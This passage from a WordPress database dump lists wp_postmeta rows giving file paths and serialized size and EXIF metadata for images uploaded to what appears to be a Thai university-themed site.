(29054, 11864, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1417;s:6:\"height\";i:1890;s:4:\"file\";s:33:\"2021/06/รองธานี.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"รองธานี-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"รองธานี-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"รองธานี-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"รองธานี-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:33:\"รองธานี-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29055, 11865, '_wp_attached_file', '2021/06/รองอานุภาพ.jpg'),
(29056, 11865, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1417;s:6:\"height\";i:1890;s:4:\"file\";s:42:\"2021/06/รองอานุภาพ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"รองอานุภาพ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"รองอานุภาพ-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"รองอานุภาพ-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:43:\"รองอานุภาพ-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:42:\"รองอานุภาพ-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29057, 11866, '_wp_attached_file', '2021/06/ว่าที่เรือตรีชูชีพ.jpg'),
(29058, 11866, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1417;s:6:\"height\";i:1890;s:4:\"file\";s:66:\"2021/06/ว่าที่เรือตรีชูชีพ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:66:\"ว่าที่เรือตรีชูชีพ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:66:\"ว่าที่เรือตรีชูชีพ-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:67:\"ว่าที่เรือตรีชูชีพ-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:67:\"ว่าที่เรือตรีชูชีพ-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:66:\"ว่าที่เรือตรีชูชีพ-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29059, 11868, '_wp_attached_file', '2021/06/Untitled-1-1.jpg'),
(29060, 11868, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:24:\"2021/06/Untitled-1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-1-1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29061, 11871, '_wp_attached_file', '2019/12/43240.jpg'),
(29062, 11871, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/43240.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"43240-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"43240-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"43240-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"43240-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"43240-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29063, 11873, '_wp_attached_file', '2021/06/1.png'),
(29064, 11873, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2021/06/1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29065, 11874, '_wp_attached_file', '2021/06/2.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(29066, 11874, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2021/06/2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"2-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29067, 11876, '_wp_attached_file', '2021/06/1-1.png'),
(29068, 11876, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/1-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29069, 11877, '_wp_attached_file', '2021/06/2-1.png'),
(29070, 11877, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/2-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29071, 11878, '_wp_attached_file', '2021/06/3.png'),
(29072, 11878, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:13:\"2021/06/3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"3-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29073, 11881, '_wp_attached_file', '2021/06/1-2.png'),
(29074, 11881, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/1-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-2-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-2-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-2-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-2-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29075, 11884, '_wp_attached_file', '2021/06/1-3.png'),
(29076, 11884, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/1-3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-3-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-3-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-3-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-3-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29077, 11885, '_wp_attached_file', '2021/06/2-2.png'),
(29078, 11885, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/2-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-2-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-2-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-2-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-2-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29079, 11887, '_wp_attached_file', '2021/06/1-4.png'),
(29080, 11887, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/1-4.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-4-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-4-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-4-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-4-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29081, 11888, '_wp_attached_file', '2021/06/2-3.png'),
(29082, 11888, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/2-3.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-3-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-3-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-3-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"2-3-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29083, 11889, '_wp_attached_file', '2021/06/3-1.png'),
(29084, 11889, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/3-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3-1-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-1-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"3-1-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"3-1-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29085, 11892, '_wp_attached_file', '2021/06/1-5.png'),
(29086, 11892, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:15:\"2021/06/1-5.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-5-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-5-768x543.png\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"1-5-1024x724.png\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-5-400x283.png\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(29087, 11896, '_wp_attached_file', '2021/06/1-6.png'),
